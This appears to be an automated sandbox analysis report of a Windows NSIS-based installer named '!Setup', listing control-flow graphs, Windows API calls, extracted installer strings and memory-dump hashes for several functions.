                                                                                control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                APIs
                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                • API String ID: 608394941-2746725676
                                                                                • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                • lstrcatW.KERNEL32(00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                • CompareFileTime.KERNEL32(-00000014,?,%IsraeliSales%,%IsraeliSales%,00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                • String ID: %IsraeliSales%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                • API String ID: 4286501637-1599634701
                                                                                • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 653 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 656 403603-403608 653->656 657 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 653->657 658 4037e2-4037e6 656->658 665 403641 657->665 666 403728-403736 call 4032d2 657->666 668 403646-40365d 665->668 672 4037f1-4037f6 666->672 673 40373c-40373f 666->673 670 403661-403663 call 403336 668->670 671 40365f 668->671 677 403668-40366a 670->677 671->670 672->658 675 403741-403759 call 403368 call 403336 673->675 676 40376b-403795 GlobalAlloc call 403368 call 40337f 673->676 675->672 704 40375f-403765 675->704 676->672 702 403797-4037a8 676->702 680 403670-403677 677->680 681 4037e9-4037f0 call 4032d2 677->681 682 4036f3-4036f7 680->682 683 403679-40368d call 405e38 680->683 681->672 689 403701-403707 682->689 690 4036f9-403700 call 4032d2 682->690 683->689 700 40368f-403696 683->700 693 403716-403720 689->693 694 403709-403713 call 4072ad 689->694 690->689 693->668 701 403726 693->701 694->693 700->689 706 403698-40369f 700->706 701->666 707 4037b0-4037b3 702->707 708 4037aa 702->708 704->672 704->676 706->689 709 4036a1-4036a8 706->709 710 4037b6-4037be 707->710 708->707 709->689 711 4036aa-4036b1 709->711 710->710 712 4037c0-4037db SetFilePointer call 405e38 710->712 711->689 713 4036b3-4036d3 711->713 716 4037e0 712->716 713->672 715 4036d9-4036dd 713->715 717 4036e5-4036ed 715->717 718 4036df-4036e3 715->718 716->658 717->689 719 4036ef-4036f1 717->719 718->701 718->717 719->689
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                Strings
                                                                                • _/, xrefs: 00403632
                                                                                • soft, xrefs: 004036A1
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                • Error launching installer, xrefs: 00403603
                                                                                • Null, xrefs: 004036AA
                                                                                • Inst, xrefs: 00403698
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$_/$soft
                                                                                • API String ID: 4283519449-3680460245
                                                                                • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 720 40337f-403398 721 4033a1-4033a9 720->721 722 40339a 720->722 723 4033b2-4033b7 721->723 724 4033ab 721->724 722->721 725 4033c7-4033d4 call 403336 723->725 726 4033b9-4033c2 call 403368 723->726 724->723 730 4033d6 725->730 731 4033de-4033e5 725->731 726->725 732 4033d8-4033d9 730->732 733 403546-403548 731->733 734 4033eb-403432 GetTickCount 731->734 737 403567-40356b 732->737 735 40354a-40354d 733->735 736 4035ac-4035af 733->736 738 403564 734->738 739 403438-403440 734->739 740 403552-40355b call 403336 735->740 741 40354f 735->741 742 4035b1 736->742 743 40356e-403574 736->743 738->737 744 403442 739->744 745 403445-403453 call 403336 739->745 740->730 753 403561 740->753 741->740 742->738 748 403576 743->748 749 403579-403587 call 403336 743->749 744->745 745->730 754 403455-40345e 745->754 748->749 749->730 757 40358d-40359f WriteFile 749->757 753->738 756 403464-403484 call 4076a0 754->756 763 403538-40353a 756->763 764 40348a-40349d GetTickCount 756->764 759 4035a1-4035a4 757->759 760 40353f-403541 757->760 759->760 762 4035a6-4035a9 759->762 760->732 762->736 763->732 765 4034e8-4034ec 764->765 766 40349f-4034a7 764->766 767 40352d-403530 765->767 768 4034ee-4034f1 765->768 769 4034a9-4034ad 766->769 770 4034af-4034e0 MulDiv wsprintfW call 404f9e 766->770 767->739 774 403536 767->774 772 403513-40351e 768->772 773 4034f3-403507 WriteFile 768->773 769->765 769->770 775 4034e5 770->775 777 403521-403525 772->777 773->760 776 403509-40350c 773->776 774->738 775->765 776->760 778 40350e-403511 776->778 777->756 779 40352b 777->779 778->777 779->738
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                • String ID: (]C$... %d%%$pAB$vyB$y9B
                                                                                • API String ID: 651206458-2231457358
                                                                                • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2740478559-0
                                                                                • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 795 401eb9-401ec4 796 401f24-401f26 795->796 797 401ec6-401ec9 795->797 798 401f53-401f7b GlobalAlloc call 406831 796->798 799 401f28-401f2a 796->799 800 401ed5-401ee3 call 4062cf 797->800 801 401ecb-401ecf 797->801 816 4030e3-4030f2 798->816 817 402387-40238d GlobalFree 798->817 802 401f3c-401f4e call 406035 799->802 803 401f2c-401f36 call 4062cf 799->803 813 401ee4-402702 call 406831 800->813 801->797 804 401ed1-401ed3 801->804 802->817 803->802 804->800 808 401ef7-402e50 call 406035 * 3 804->808 808->816 828 402708-40270e 813->828 817->816 828->816
                                                                                APIs
                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                • GlobalFree.KERNELBASE(006BB930), ref: 00402387
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FreeGloballstrcpyn
                                                                                • String ID: %IsraeliSales%$Exch: stack < %d elements$Pop: stack empty
                                                                                • API String ID: 1459762280-1719584793
                                                                                • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 830 4022fd-402325 call 40145c GetFileVersionInfoSizeW 833 4030e3-4030f2 830->833 834 40232b-402339 GlobalAlloc 830->834 834->833 836 40233f-40234e GetFileVersionInfoW 834->836 838 402350-402367 VerQueryValueW 836->838 839 402384-40238d GlobalFree 836->839 838->839 840 402369-402381 call 405f7d * 2 838->840 839->833 840->839
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                • GlobalFree.KERNELBASE(006BB930), ref: 00402387
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                • String ID:
                                                                                • API String ID: 3376005127-0
                                                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
